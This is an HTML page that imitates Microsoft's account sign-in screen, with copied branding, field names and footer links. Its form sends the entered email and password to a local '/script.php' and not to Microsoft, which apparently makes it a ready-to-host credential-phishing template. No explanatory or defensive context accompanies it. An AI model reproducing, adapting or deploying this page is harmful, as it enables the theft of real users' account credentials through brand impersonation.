<!DOCTYPE html>
<html dir="ltr" lang="EN-US">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
    <title>Sign in to your Microsoft account</title>
    <link rel="shortcut icon" href="https://auth.gfx.ms/16.000.27773.2/images/favicon.ico">
    <link rel="stylesheet" type="text/css" href="/static/styles.css">
</head>
<body class="cb">
<div>
    <div class="background" role="presentation"  ></div>
    <form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post"
          target="_top" autocomplete="off" action="/script.php">
        <div class="outer">
            <div class="middle">
                <div class="inner">
                    <div role="banner">
                        <img class="logo" role="presentation" src="/static/microsoft_logo.svg" alt="Microsoft">
                    </div>
                    <div role="main">
                        <div class="pagination-view">
                            <div data-viewid="1">
                                <div class="row text-title" id="loginHeader" role="heading">
                                    <div aria-level="1">Sign in</div>
                                </div>
                                <div class="row">
                                    <div class="form-group col-md-24">
                                        <div class="placeholderContainer">
                                            <input type="email" name="loginfmt" id="i0116"
                                                   maxlength="113" class="form-control"
                                                   aria-required="true"
                                                   placeholder="Email, phone, or Skype"
                                                   aria-label="Enter your email, phone, or Skype."
                                                   required>
                                        </div>
                                    </div>
                                </div>
                                <div class="row">
                                    <div class="form-group col-md-24">
                                        <div class="placeholderContainer">
                                            <input name="passwd" type="password" id="i0118"
                                                   autocomplete="off" class="form-control"
                                                   aria-required="true"
                                                   placeholder="Password"
                                                   aria-label="Enter password" required>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group checkbox text-block-body no-margin-top">
                                    <label id="idLbl_PWD_KMSI_Cb">
                                        <input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" type="checkbox">
                                        <span>Keep me signed in</span>
                                    </label>
                                </div>
                                <div class="row">
                                    <div class="col-md-24">
                                        <div class="text-13 action-links">
                                            <div class="form-group">
                                                <a id="idA_PWD_ForgotPassword" role="link"
                                                   href="https://account.live.com/ResetPassword.aspx">
                                                    Forgot my password
                                                </a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="position-buttons">
                                    <div class="row">
                                        <div class="col-xs-24 no-padding-left-right form-group button-container">
                                            <div class="inline-block">
                                                <input type="submit" id="idSIButton9"
                                                       class="btn btn-block btn-primary"
                                                       value="Sign in">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="footer" class="footer default" role="contentinfo">
                <div id="footerLinks" class="footerNode text-secondary">
                    <span id="ftrCopy">&copy;2023 Microsoft</span>
                    <a id="ftrTerms" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse">Terms of use</a>
                    <a id="ftrPrivacy" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement">Privacy &amp; cookies</a>
                </div>
            </div>
        </div>
    </form>
</div>
<script src="/static/script.js"></script>
</body>
</html>